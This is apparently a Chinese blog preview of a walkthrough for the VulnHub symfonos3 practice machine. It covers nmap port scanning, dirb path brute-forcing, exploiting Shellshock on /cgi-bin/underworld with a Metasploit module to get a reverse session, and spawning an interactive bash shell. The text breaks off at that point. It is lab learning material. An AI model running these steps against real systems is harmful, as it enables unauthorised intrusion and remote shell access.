文章预览
本周实践的是vulnhub的symfonos3镜像, 下载地址,https://download.vulnhub.com/symfonos/symfonos3v2.7z, 用workstation导入成功, console上直接能看到靶机的ip地址,192.168.88.138, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.138, 发现靶机开了21端口的ftp服务、22端口的ssh服务、80端口的http服务, 对http服务的路径进行暴破,dirb http://192.168.88.138, 获取到http://192.168.88.138/cgi-bin, 对http://192.168.88.138/cgi-bin进一步扫描, 获取到http://192.168.88.138/cgi-bin/underworld, cgi猜测有shellshock漏洞,在msf里搜索利用方法search shellshock, use exploit/multi/http/apache_mod_cgi_bash_env_exec show options set RHOSTS 192.168.88.138 set TARGETURI /cgi-bin/underworld exploit 获取到msf的shell,然后修改攻击机端口再获取一个,set LPORT 4455, 在其中一个msf的shell下进入普通shell, 转成交互式的,python -c 'import pty;pty.spawn("/bin/bash")'
………………………………